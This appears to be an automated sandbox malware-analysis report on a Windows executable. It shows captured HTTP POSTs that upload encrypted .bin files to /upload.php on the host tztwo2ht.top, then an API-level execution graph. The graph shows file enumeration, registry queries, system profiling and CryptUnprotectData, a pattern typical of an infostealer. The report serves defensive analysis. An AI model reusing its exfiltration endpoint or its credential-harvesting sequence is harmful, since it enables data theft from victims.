        Jul 13, 2024 19:08:50.290041924 CEST1424OUTData Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 34 30 38 37 36 34 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 61 6b
        Data Ascii: ------Boundary40876462Content-Disposition: form-data; name="file"; filename="Lakaki.bin"Content-Type: application/octet-streamswdUgMB1$TEg ,sYa`r _g`>|-!vU*ZRk{l1@|
        Jul 13, 2024 19:08:50.512942076 CEST190INHTTP/1.1 200 OK
        server: nginx/1.18.0 (Ubuntu)
        date: Sat, 13 Jul 2024 17:08:50 GMT
        content-type: text/plain; charset=utf-8
        content-length: 2
        etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
        Data Raw: 4f 4b
        Data Ascii: OK
        Jul 13, 2024 19:08:53.415340900 CEST330OUTPOST /upload.php HTTP/1.1
        Cache-Control: no-cache
        Connection: Keep-Alive
        Pragma: no-cache
        Content-Type: multipart/form-data; boundary=----Boundary86828523
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
        Content-Length: 79310
        Host: tztwo2ht.top
        Jul 13, 2024 19:08:53.415462017 CEST13596OUTData Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 36 38 32 38 35 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 69 6d
        Data Ascii: ------Boundary86828523Content-Disposition: form-data; name="file"; filename="Ximuku.bin"Content-Type: application/octet-stream#YTjGWeGp7+u_$PjsAGW0t[("Jk+w(QKL?i{1l-/
        Jul 13, 2024 19:08:53.420581102 CEST1236OUTData Raw: af 38 a1 73 22 c1 ac 8f 05 b3 fd 31 ba 40 36 98 c5 01 7d 75 ca c4 7c 74 6c 56 68 ee f5 80 23 b9 7d b2 e7 a5 32 30 0b 9e 9f b6 de 34 5a 46 17 43 b9 60 22 13 0f ff a1 2f 46 f0 4d f7 ac 2f ca e8 09 90 41 b4 12 ee ec 9d e3 24 db cf cb 3c f8 70 6f 45
        Data Ascii: 8s"1@6}u|tlVh#}204ZFC`"/FM/A$<poE8`!zZ'/?Ph&my,)qS{ojqL?j$<4n/pSM0B8>j|U~Y9T?bk5,>kr
        Jul 13, 2024 19:08:53.420581102 CEST2472OUTData Raw: c3 11 12 8a b7 25 e2 6d f3 7a a5 c3 2e af 9b 5e 30 6b 98 a9 93 4d 97 ce 36 cd 78 ed 63 d1 22 4e 46 25 2e 5c 76 cc d6 57 24 8f 8b fc 47 bb 3c 2b de fe 20 8d 94 e7 9d 4d 59 b5 f5 23 bc 0e 4a b9 53 28 bc 00 0a 35 ca e2 96 4d 83 e3 97 a2 ea 78 62 b9
        Data Ascii: %mz.^0kM6xc"NF%.\vW$G<+ MY#JS(5MxbYF8Q3Z;"[3qgkEv2f8p&zEnyHsT;0OsiYG}\'3@U/M_!i5d9z-+tr
        Jul 13, 2024 19:08:53.420622110 CEST2472OUTData Raw: 4c 5e cd 27 e7 4a ab 5b 8e 6f c8 37 5b a7 57 77 54 3d 42 be 75 72 6b 19 cf 03 d5 14 4f c2 bc 91 62 ee 77 20 6f 9c 12 dd 36 a6 77 c0 3e e0 76 e3 c7 23 89 4c 69 95 d3 d5 a8 aa 29 3a 41 c6 51 39 f6 7a 77 65 3f 18 de bf 7f 4d 4c 1d 54 1d ce 70 66 63
        Data Ascii: L^'J[o7[WwT=BurkObw o6w>v#Li):AQ9zwe?MLTpfcCgKx&B"%>j2c<4?I/h9sLPK4_8z!by}Dy~Yi#|0Su.@9]X)8
        Jul 13, 2024 19:08:53.420658112 CEST7416OUTData Raw: db 50 7e fd 28 b6 65 8a bf 38 b6 67 a8 b4 ef bf 20 23 d0 1a 5a aa 40 45 87 f6 6d d2 e0 3a b5 46 62 16 47 09 0b 8b 4d b5 be c9 31 68 25 a6 0d 4a f1 d6 e5 8e 1b 2d 75 09 28 49 6d 18 4b 9c 03 c4 de de b9 97 b5 1a 65 64 fe e5 fb 46 fd d6 0a 64 11 1b
        Data Ascii: P~(e8g #Z@Em:FbGM1h%J-u(ImKedFdG-l$&f;(U$XjsH1RsL!cqKolk\cMG.?{I$Y_[3~)eYGT-'P-iO5U5Dpvm|!4:O
        Jul 13, 2024 19:08:53.420716047 CEST4944OUTData Raw: 4e 55 77 75 57 dd 35 c7 8b d3 39 33 d0 13 e2 f0 1b ba 39 d6 b9 ec a0 19 39 8b 8e c1 50 63 1a 40 56 b8 ad 2a 38 f9 0c 96 6c c3 99 53 15 43 4e 04 d7 e1 cb 56 72 59 9e e5 51 6c be 6d 4a ad ea c4 00 65 c4 8a a6 b3 fe 78 36 79 33 01 63 18 0b a4 f3 a2
        Data Ascii: NUwuW59399Pc@V*8lSCNVrYQlmJex6y3c;m]Eqhh>|=b@] )ueyRpy K=pnW8bhF?UV4d puDb 7iPc,39xG(C@kFK^@BK+PMPf[i
        Jul 13, 2024 19:08:53.421149969 CEST2472OUTData Raw: a7 4b 37 b7 30 6d 9b a8 23 34 c1 f0 83 3e de e1 6f 55 8a 11 b8 61 1a cc fd 6e c1 e9 a1 bb 17 ae da 0f 52 2f bf 92 70 1f 44 39 e2 ee 95 92 c3 41 4c 28 11 e7 0b 9f 01 2f 4c 30 05 f1 94 36 22 36 c5 fb 64 fd 42 f9 22 b2 bf 12 af 18 05 9f 20 6c 42 e7
        Data Ascii: K70m#4>oUanR/pD9AL(/L06"6dB" lBxNlN,yh|b*0037s+=+x^I$IFxR>1l[!O89;Riu`HKZc/' n\K(p#f
        Jul 13, 2024 19:08:53.421192884 CEST2472OUTData Raw: 1c 43 d6 07 b2 89 94 d2 01 b1 9f ba 3f be da 78 98 fb 2f 0e 14 2b 28 a3 56 20 d3 a6 c6 b9 12 15 08 06 ce 67 64 8b c1 33 a2 81 d9 cf 77 22 8c 20 f9 6f e0 97 b9 6b ff fd 11 59 b1 46 76 6e 91 3f a5 2c 44 d3 36 48 3a 80 5e fe e6 4e c9 7c a4 db 8c b5
        Data Ascii: C?x/+(V gd3w" okYFvn?,D6H:^N|g(m@/-zxd/Dqj [5gW$p+h&.@q^Xhtc]]_30bWg%NQx.?lJDsRdqZ<$)E9Nw7X.~1R
        Jul 13, 2024 19:08:53.882766962 CEST190INHTTP/1.1 200 OK
        server: nginx/1.18.0 (Ubuntu)
        date: Sat, 13 Jul 2024 17:08:53 GMT
        content-type: text/plain; charset=utf-8
        content-length: 2
        etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
        Data Raw: 4f 4b
        Data Ascii: OK


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Target ID:0
        Start time:13:08:42
        Start date:13/07/2024
        Path:C:\Users\user\Desktop\vk2wTOx91s.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\Desktop\vk2wTOx91s.exe"
        Imagebase:0x50000
        File size:1'949'184 bytes
        MD5 hash:2FBF1FC802AC4B340B1FD7B3E4659974
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:true

        Reset < >

          Execution Graph

          Execution Coverage:6.1%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:16.3%
          Total number of Nodes:496
          Total number of Limit Nodes:55
          execution_graph 22318 6fe69e 22323 6fe622 22318->22323 22320 6fe814 CatchGuardHandler 22321 6fe6be _memset 22321->22320 22326 6fe3eb 22321->22326 22332 6fce69 22323->22332 22325 6fe636 22325->22321 22327 6fe411 _memset 22326->22327 22328 6fe4d1 CatchGuardHandler 22327->22328 22343 700149 22327->22343 22328->22320 22331 700149 ___crtLCMapStringA 10 API calls 22331->22328 22333 6fce7c 22332->22333 22339 6fcec9 22332->22339 22340 6ff027 5 API calls __amsg_exit 22333->22340 22335 6fce81 22336 6fcea9 22335->22336 22341 6fecea 6 API calls 4 library calls 22335->22341 22336->22339 22342 6fe57e 6 API calls 4 library calls 22336->22342 22339->22325 22340->22335 22341->22336 22342->22339 22344 6fce69 x_ismbbtype_l 6 API calls 22343->22344 22345 70015c 22344->22345 22348 6ffda4 22345->22348 22347 6fe4ac 22347->22331 22349 6ffdc5 ___crtLCMapStringA 22348->22349 22350 6fffde 22349->22350 22351 6ffe3a 22349->22351 22382 703ef5 6 API calls 2 library calls 22350->22382 22353 6ffe53 MultiByteToWideChar 22351->22353 22354 6fffd5 CatchGuardHandler 22351->22354 22353->22354 22356 6ffe80 22353->22356 22354->22347 22355 6ffed1 MultiByteToWideChar 22358 6fffcc 22355->22358 22359 6ffeea 22355->22359 22363 6ffe99 ___crtLCMapStringA 22356->22363 22378 6ff8f7 5 API calls 4 library calls 22356->22378 22381 6ffd84 HeapFree _realloc 22358->22381 22364 6ffef0 MultiByteToWideChar 22359->22364 22361 700056 22362 700121 22361->22362 22385 6fe2ca HeapFree _realloc 22361->22385 22362->22354 22386 6fe2ca HeapFree _realloc 22362->22386 22363->22354 22363->22355 22364->22358 22366 6fff0b 22364->22366 22367 6fff14 22366->22367 22370 6fff3d 22366->22370 22367->22358 22369 6fff26 MultiByteToWideChar 22367->22369 22369->22358 22374 6fff58 ___crtLCMapStringA 22370->22374 22379 6ff8f7 5 API calls 4 library calls 22370->22379 22372 700006 22372->22354 22372->22361 22376 70006e _memset ___crtLCMapStringA 22372->22376 22383 6ff8f7 5 API calls 4 library calls 22372->22383 22374->22358 22380 6ffd84 HeapFree _realloc 22374->22380 22376->22361 22384 6ffd84 HeapFree _realloc 22376->22384 22378->22363 22379->22374 22380->22358 22381->22354 22382->22372 22383->22376 22384->22361 22385->22362 22386->22354 21881 66085 GetPEB 21882 6609f 21881->21882 22387 6fe07c 22391 6fe08b 22387->22391 22388 6fe13e 22390 6fe19c 22388->22390 22399 6fe143 22388->22399 22389 6fe10d 22392 6fe128 22389->22392 22395 6fe096 22389->22395 22403 70157f 5 API calls _doexit 22389->22403 22390->22395 22408 6ff170 HeapFree TlsGetValue TlsGetValue TlsSetValue __freefls@4 22390->22408 22391->22388 22391->22389 22391->22395 22392->22395 22404 701830 HeapFree _realloc 22392->22404 22397 6fe132 22405 6fee8a HeapFree TlsFree _realloc 22397->22405 22399->22395 22407 6fe2ca HeapFree _realloc 22399->22407 22400 6fe137 22406 701d64 HeapFree HeapFree 22400->22406 22403->22392 22404->22397 22405->22400 22406->22395 22407->22395 22408->22395 21883 54780 21886 54460 21883->21886 21885 54785 21887 54482 21886->21887 21912 5ee40 21887->21912 21890 5ee40 2 API calls 21892 545f7 21890->21892 21891 54767 _ValidateLocalCookies 21891->21885 21892->21891 21917 5ef00 21892->21917 21894 54667 21895 5ef00 FindFirstFileW 21894->21895 21911 54759 21894->21911 21899 54676 21895->21899 21898 54840 ??3@YAXPAX 21898->21891 21900 5468d CreateDirectoryW 21899->21900 21899->21911 21901 54694 21900->21901 21902 546a8 Sleep 21901->21902 21921 5fa10 21902->21921 21904 546af 21947 5a8c0 21904->21947 21906 546b4 21907 546c8 Sleep 21906->21907 21955 5fbb0 21907->21955 21909 546cf 21910 546e3 Sleep 21909->21910 21910->21911 21991 54840 21911->21991 21995 54790 21912->21995 21914 5ee7e 21915 545eb 21914->21915 21916 54840 ??3@YAXPAX 21914->21916 21915->21890 21916->21915 21918 60380 21917->21918 21919 5ef49 FindFirstFileW 21918->21919 21920 5ef5a _ValidateLocalCookies 21919->21920 21920->21894 21999 54370 21921->21999 21923 5fa59 21944 5fb59 21923->21944 22014 5ab70 21923->22014 21925 5fa6e 21933 5fa86 21925->21933 22042 52d00 ??3@YAXPAX 21925->22042 21927 5faa6 21929 5faff 21927->21929 21930 5fab2 21927->21930 21932 5fb1a 21929->21932 21934 54840 ??3@YAXPAX 21929->21934 21930->21933 21935 5facf 21930->21935 21938 54840 ??3@YAXPAX 21930->21938 21931 5fb26 21937 5fb32 21931->21937 21940 54840 ??3@YAXPAX 21931->21940 21932->21931 21936 54840 ??3@YAXPAX 21932->21936 21933->21944 22018 5efb0 21933->22018 21934->21932 21939 5fadb 21935->21939 21942 54840 ??3@YAXPAX 21935->21942 21936->21931 21941 54840 ??3@YAXPAX 21937->21941 21938->21935 21943 5fae7 21939->21943 21945 54840 ??3@YAXPAX 21939->21945 21940->21937 21941->21933 21942->21939 21946 54840 ??3@YAXPAX 21943->21946 21944->21904 21945->21943 21946->21933 21948 5ee40 2 API calls 21947->21948 21949 5a8cb 21948->21949 21950 5a8d1 21949->21950 22068 59040 21949->22068 21950->21906 21952 5a8da 21953 54840 ??3@YAXPAX 21952->21953 21954 5a8e1 21953->21954 21954->21906 21956 54370 4 API calls 21955->21956 21957 5fbf9 21956->21957 21958 5ab70 2 API calls 21957->21958 21975 5fd1c 21957->21975 21959 5fc0e 21958->21959 22089 5c8e0 21959->22089 21961 5fc15 22097 5c560 21961->22097 21963 5fc1c 22103 5bb00 21963->22103 21965 5fc23 22108 5b840 21965->22108 21967 5fc2a 22112 5e330 21967->22112 21969 5fc31 21970 5fc49 21969->21970 22154 52d00 ??3@YAXPAX 21969->22154 21973 5efb0 3 API calls 21970->21973 21970->21975 21972 5fc69 21974 5fcc2 21972->21974 21980 5fc75 21972->21980 21973->21975 21976 5fcdd 21974->21976 21977 54840 ??3@YAXPAX 21974->21977 21975->21909 21978 5fce9 21976->21978 21981 54840 ??3@YAXPAX 21976->21981 21977->21976 21982 5fcf5 21978->21982 21985 54840 ??3@YAXPAX 21978->21985 21979 5fc92 21984 5fc9e 21979->21984 21987 54840 ??3@YAXPAX 21979->21987 21980->21970 21980->21979 21983 54840 ??3@YAXPAX 21980->21983 21981->21978 21986 54840 ??3@YAXPAX 21982->21986 21983->21979 21988 5fcaa 21984->21988 21989 54840 ??3@YAXPAX 21984->21989 21985->21982 21986->21970 21987->21984 21990 54840 ??3@YAXPAX 21988->21990 21989->21988 21990->21970 21992 54878 21991->21992 21993 54760 21991->21993 21994 54885 ??3@YAXPAX 21992->21994 21993->21898 21994->21993 21996 547c8 21995->21996 21998 547e1 _unexpected 21995->21998 21997 547d5 malloc 21996->21997 21997->21998 21998->21914 22000 54790 malloc 21999->22000 22002 54382 _unexpected 22000->22002 22001 54388 22001->21923 22002->22001 22003 543b4 22002->22003 22004 543cb 22002->22004 22043 542c0 ??3@YAXPAX 22003->22043 22007 543e9 CreateFileMappingW 22004->22007 22006 543be 22006->21923 22008 543f2 22007->22008 22012 54413 22007->22012 22011 5440a MapViewOfFile 22008->22011 22010 54431 22010->21923 22011->22012 22013 5443e 22011->22013 22044 542c0 ??3@YAXPAX 22012->22044 22013->21923 22015 5abad 22014->22015 22045 53cd0 22015->22045 22017 5abd5 22017->21925 22021 5f01d 22018->22021 22019 54790 malloc 22020 5f273 22019->22020 22022 54790 malloc 22020->22022 22021->22019 22021->22021 22023 5f285 22022->22023 22024 54790 malloc 22023->22024 22025 5f295 22024->22025 22026 54790 malloc 22025->22026 22037 5f2a5 22026->22037 22027 5f736 22028 5f747 22027->22028 22031 54840 ??3@YAXPAX 22027->22031 22029 5f758 22028->22029 22032 54840 ??3@YAXPAX 22028->22032 22033 5f769 22029->22033 22034 54840 ??3@YAXPAX 22029->22034 22030 54840 ??3@YAXPAX 22030->22027 22031->22028 22032->22029 22035 54840 ??3@YAXPAX 22033->22035 22036 5f77a _ValidateLocalCookies 22033->22036 22034->22033 22035->22036 22036->21944 22037->22027 22038 54790 malloc 22037->22038 22040 5f729 22037->22040 22041 5f39d 22038->22041 22039 5f4f4 Sleep 22039->22041 22040->22030 22041->22039 22041->22040 22042->21927 22043->22006 22044->22010 22046 53cfa 22045->22046 22047 54790 malloc 22046->22047 22048 53d0b _ValidateLocalCookies 22046->22048 22049 53da4 _unexpected 22047->22049 22048->22017 22049->22048 22050 54286 22049->22050 22058 53e0c 22049->22058 22051 54840 ??3@YAXPAX 22050->22051 22051->22048 22052 54840 ??3@YAXPAX 22052->22048 22054 54171 22055 54278 22054->22055 22063 5407a 22054->22063 22056 54840 ??3@YAXPAX 22055->22056 22056->22048 22057 54034 22057->22054 22060 540f7 22057->22060 22057->22063 22058->22057 22058->22058 22058->22063 22064 53a40 22058->22064 22059 54840 ??3@YAXPAX 22059->22048 22061 54148 22060->22061 22060->22063 22061->22059 22062 5421e _ValidateLocalCookies 22061->22062 22062->22017 22063->22052 22063->22062 22065 53a59 22064->22065 22067 53a63 _unexpected 22064->22067 22066 54790 malloc 22065->22066 22066->22067 22067->22057 22069 59d73 _ValidateLocalCookies 22068->22069 22070 59082 22068->22070 22069->21952 22070->22069 22071 590ef FindFirstFileW 22070->22071 22071->22069 22075 5910a 22071->22075 22072 59d51 FindNextFileW 22073 59d63 22072->22073 22072->22075 22074 59d70 FindClose 22073->22074 22074->22069 22075->22072 22075->22075 22079 59040 2 API calls 22075->22079 22081 58440 malloc ??3@YAXPAX 22075->22081 22083 57d80 malloc ??3@YAXPAX 22075->22083 22084 585d0 malloc ??3@YAXPAX _ValidateLocalCookies 22075->22084 22085 57ec0 malloc ??3@YAXPAX 22075->22085 22086 58090 malloc ??3@YAXPAX _ValidateLocalCookies 22075->22086 22087 58270 malloc ??3@YAXPAX 22075->22087 22088 58f30 malloc ??3@YAXPAX 22075->22088 22079->22075 22081->22075 22083->22075 22084->22075 22085->22075 22086->22075 22087->22075 22088->22075 22090 5c92d 22089->22090 22092 5caba _ValidateLocalCookies 22089->22092 22091 54790 malloc 22090->22091 22093 5c937 22091->22093 22092->21961 22093->22092 22094 53cd0 2 API calls 22093->22094 22095 5cab0 22094->22095 22096 54840 ??3@YAXPAX 22095->22096 22096->22092 22098 5c5ab 22097->22098 22099 5c8af _ValidateLocalCookies 22097->22099 22098->22099 22101 53cd0 2 API calls 22098->22101 22102 54840 ??3@YAXPAX 22098->22102 22155 5a3e0 22098->22155 22099->21963 22101->22098 22102->22098 22104 5c010 _ValidateLocalCookies 22103->22104 22105 5bb5f 22103->22105 22104->21965 22105->22104 22107 53cd0 malloc ??3@YAXPAX 22105->22107 22167 5ac20 22105->22167 22107->22105 22109 5bad5 _ValidateLocalCookies 22108->22109 22110 5b887 22108->22110 22109->21967 22110->22109 22111 5ac20 8 API calls 22110->22111 22111->22110 22113 5e34c 22112->22113 22187 5dbe0 22113->22187 22115 5e378 _unexpected 22193 5d330 22115->22193 22117 5e3cc _unexpected 22197 5d570 22117->22197 22119 5e3f3 22201 5dae0 22119->22201 22121 5e402 22122 5dae0 4 API calls 22121->22122 22123 5e41a 22122->22123 22211 5dfe0 22123->22211 22125 5e428 22217 5e100 22125->22217 22127 5e433 22128 54790 malloc 22127->22128 22129 5e449 22128->22129 22130 5e4a8 22129->22130 22221 5d720 22129->22221 22132 54790 malloc 22130->22132 22138 5e4bb 22132->22138 22133 5e472 22134 5d720 7 API calls 22133->22134 22135 5e48d 22134->22135 22136 5d720 7 API calls 22135->22136 22136->22130 22137 5eabe _ValidateLocalCookies 22137->21969 22138->22137 22138->22138 22139 53cd0 2 API calls 22138->22139 22140 5ea5a 22139->22140 22141 5ea6e 22140->22141 22142 54840 ??3@YAXPAX 22140->22142 22143 5ea7f 22141->22143 22144 54840 ??3@YAXPAX 22141->22144 22142->22141 22145 5ea90 22143->22145 22147 54840 ??3@YAXPAX 22143->22147 22144->22143 22146 5eaa1 22145->22146 22148 54840 ??3@YAXPAX 22145->22148 22149 5eaac 22146->22149 22150 54840 ??3@YAXPAX 22146->22150 22147->22145 22148->22146 22151 5eab7 22149->22151 22152 54840 ??3@YAXPAX 22149->22152 22150->22149 22153 54840 ??3@YAXPAX 22151->22153 22152->22151 22153->22137 22154->21972 22156 60380 22155->22156 22157 5a42a CreateFileW 22156->22157 22158 5a446 22157->22158 22159 5a471 22157->22159 22158->22159 22160 54790 malloc 22158->22160 22159->22098 22161 5a466 22160->22161 22161->22159 22162 5a49a ReadFile 22161->22162 22163 5a4aa 22162->22163 22164 5a4bb 22162->22164 22165 54840 ??3@YAXPAX 22163->22165 22166 5a4d0 FindCloseChangeNotification 22164->22166 22165->22159 22166->22098 22168 5b1eb _ValidateLocalCookies 22167->22168 22169 5ac70 22167->22169 22168->22105 22169->22168 22169->22169 22171 5ac20 8 API calls 22169->22171 22172 53cd0 2 API calls 22169->22172 22173 5a3e0 malloc ??3@YAXPAX CreateFileW ReadFile FindCloseChangeNotification 22169->22173 22174 54840 ??3@YAXPAX 22169->22174 22175 5a510 22169->22175 22171->22169 22172->22169 22173->22169 22174->22169 22176 60380 22175->22176 22177 5a55a CreateFileW 22176->22177 22186 5a57a 22177->22186 22178 54790 malloc 22179 5a64a 22178->22179 22180 5a674 22179->22180 22181 5a65d ReadFile 22179->22181 22180->22169 22182 5a66d 22181->22182 22183 5a69a 22181->22183 22184 54840 ??3@YAXPAX 22182->22184 22185 5a6af FindCloseChangeNotification 22183->22185 22184->22180 22185->22169 22186->22178 22186->22180 22189 5dbfc _unexpected 22187->22189 22188 5df7e _ValidateLocalCookies 22188->22115 22189->22188 22190 54790 malloc 22189->22190 22192 5dcef 22190->22192 22191 54840 ??3@YAXPAX 22191->22188 22192->22188 22192->22191 22194 5d3a2 _unexpected 22193->22194 22195 5d3d6 GetTimeZoneInformation 22194->22195 22196 5d3ea _unexpected _ValidateLocalCookies 22195->22196 22196->22117 22200 5d5bf 22197->22200 22198 5d6d1 _ValidateLocalCookies 22198->22119 22199 5d5ff GetLocaleInfoW 22199->22200 22200->22198 22200->22199 22200->22200 22202 54790 malloc 22201->22202 22203 5db25 22202->22203 22204 5dbb0 22203->22204 22205 5db3e RegOpenKeyExW 22203->22205 22204->22121 22206 5db55 22205->22206 22210 5db9f 22205->22210 22208 5db62 RegQueryValueExW 22206->22208 22207 54840 ??3@YAXPAX 22207->22204 22209 5db81 22208->22209 22208->22210 22209->22121 22210->22207 22212 5e028 _unexpected 22211->22212 22213 5e041 GlobalMemoryStatusEx 22212->22213 22214 5e04f 22213->22214 22216 5e07e _ValidateLocalCookies 22213->22216 22215 54790 malloc 22214->22215 22215->22216 22216->22125 22218 5e151 _unexpected 22217->22218 22219 54790 malloc 22218->22219 22220 5e188 _ValidateLocalCookies 22218->22220 22219->22220 22220->22127 22222 60380 22221->22222 22223 5d778 RegOpenKeyExW 22222->22223 22224 5d7d2 _ValidateLocalCookies 22223->22224 22232 5d78e 22223->22232 22224->22133 22225 5d79f RegEnumKeyExW 22226 5daa7 22225->22226 22225->22232 22227 5dab1 RegCloseKey 22226->22227 22227->22224 22228 5d80c RegOpenKeyExW 22228->22224 22228->22232 22229 5d846 RegQueryValueExW 22229->22232 22230 5da9a RegCloseKey 22230->22232 22231 5d92a RegQueryValueExW 22231->22232 22232->22224 22232->22225 22232->22228 22232->22229 22232->22230 22232->22231 22233 5ff60 22234 5ff7c 22233->22234 22235 54370 4 API calls 22234->22235 22236 5ffba 22235->22236 22237 5ab70 2 API calls 22236->22237 22239 5fff0 _ValidateLocalCookies 22236->22239 22238 5ffce 22237->22238 22240 6000c 22238->22240 22243 5ffe9 22238->22243 22278 5ccb0 5 API calls _ValidateLocalCookies 22240->22278 22242 60018 22279 5ccb0 5 API calls _ValidateLocalCookies 22242->22279 22277 542c0 ??3@YAXPAX 22243->22277 22246 60024 22280 5ccb0 5 API calls _ValidateLocalCookies 22246->22280 22248 60030 22281 5ccb0 5 API calls _ValidateLocalCookies 22248->22281 22250 6003c 22282 5ccb0 5 API calls _ValidateLocalCookies 22250->22282 22252 60048 22283 5ccb0 5 API calls _ValidateLocalCookies 22252->22283 22254 60054 22284 5ccb0 5 API calls _ValidateLocalCookies 22254->22284 22256 60060 _unexpected 22257 60134 22256->22257 22285 52d00 ??3@YAXPAX 22256->22285 22257->22239 22260 5efb0 3 API calls 22257->22260 22259 6015a 22261 601b9 22259->22261 22266 60166 22259->22266 22260->22239 22262 601da 22261->22262 22263 54840 ??3@YAXPAX 22261->22263 22264 601e6 22262->22264 22267 54840 ??3@YAXPAX 22262->22267 22263->22262 22268 601f2 22264->22268 22270 54840 ??3@YAXPAX 22264->22270 22265 60183 22269 6018f 22265->22269 22273 54840 ??3@YAXPAX 22265->22273 22266->22257 22266->22265 22272 54840 ??3@YAXPAX 22266->22272 22267->22264 22271 54840 ??3@YAXPAX 22268->22271 22274 6019b 22269->22274 22275 54840 ??3@YAXPAX 22269->22275 22270->22268 22271->22257 22272->22265 22273->22269 22276 54840 ??3@YAXPAX 22274->22276 22275->22274 22276->22257 22277->22239 22278->22242 22279->22246 22280->22248 22281->22250 22282->22252 22283->22254 22284->22256 22285->22259 22409 5fdd0 22409->22409 22410 5fddc 22409->22410 22411 53cd0 2 API calls 22410->22411 22412 5fdfa 22411->22412 22413 5ab70 2 API calls 22412->22413 22414 5fe04 22413->22414 22449 5c2e0 8 API calls _ValidateLocalCookies 22414->22449 22416 5fe0b 22442 55090 22416->22442 22418 5fe19 22450 5c040 5 API calls _ValidateLocalCookies 22418->22450 22420 5fe20 22439 5fe38 22420->22439 22451 52d00 ??3@YAXPAX 22420->22451 22422 5fe58 22424 5feb1 22422->22424 22430 5fe64 22422->22430 22423 5ff0b 22426 5fecc 22424->22426 22427 54840 ??3@YAXPAX 22424->22427 22425 5efb0 3 API calls 22425->22423 22428 5fed8 22426->22428 22431 54840 ??3@YAXPAX 22426->22431 22427->22426 22432 5fee4 22428->22432 22434 54840 ??3@YAXPAX 22428->22434 22429 5fe81 22436 54840 ??3@YAXPAX 22429->22436 22437 5fe8d 22429->22437 22430->22429 22433 54840 ??3@YAXPAX 22430->22433 22430->22439 22431->22428 22435 54840 ??3@YAXPAX 22432->22435 22433->22429 22434->22432 22435->22439 22436->22437 22438 5fe99 22437->22438 22440 54840 ??3@YAXPAX 22437->22440 22441 54840 ??3@YAXPAX 22438->22441 22439->22423 22439->22425 22440->22438 22441->22439 22443 550d3 22442->22443 22444 5511f 22443->22444 22445 53cd0 2 API calls 22443->22445 22444->22418 22446 550ec 22445->22446 22447 54840 ??3@YAXPAX 22446->22447 22448 550f6 22447->22448 22448->22418 22449->22416 22450->22420 22451->22422 22286 54723 22287 54728 22286->22287 22288 5472e FreeLibrary 22287->22288 22289 54742 _ValidateLocalCookies 22287->22289 22288->22287 22452 603d0 22453 603e0 22452->22453 22454 60423 22452->22454 22453->22454 22455 6040d LoadLibraryW 22453->22455 22455->22454 22290 5b54b 22291 5b550 22290->22291 22292 53cd0 2 API calls 22291->22292 22297 5b2b8 22292->22297 22293 54840 ??3@YAXPAX 22293->22297 22294 5a3e0 5 API calls 22294->22297 22297->22293 22297->22294 22298 53cd0 2 API calls 22297->22298 22299 5a7e0 22297->22299 22303 5a6e0 22297->22303 22298->22297 22300 5a7f3 22299->22300 22301 54790 malloc 22300->22301 22302 5a836 _unexpected 22300->22302 22301->22302 22302->22297 22304 60380 22303->22304 22305 5a739 CryptUnprotectData 22304->22305 22306 5a753 22305->22306 22308 5a75b 22305->22308 22307 54790 malloc 22306->22307 22307->22308 22308->22297 22309 54aaa 22310 54ab9 _unexpected 22309->22310 22311 54790 malloc 22310->22311 22312 54d11 22310->22312 22311->22312 22313 53cd0 2 API calls 22312->22313 22317 54d59 _ValidateLocalCookies 22312->22317 22314 550ec 22313->22314 22315 54840 ??3@YAXPAX 22314->22315 22316 550f6 22315->22316
          APIs
          • FindFirstFileW.KERNELBASE(?,?,7D5DF9B0,00000000,00000000,00000001), ref: 000590FD
          • FindNextFileW.KERNELBASE(00000000,?), ref: 00059D59
          • FindClose.KERNELBASE(00000000), ref: 00059D71
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
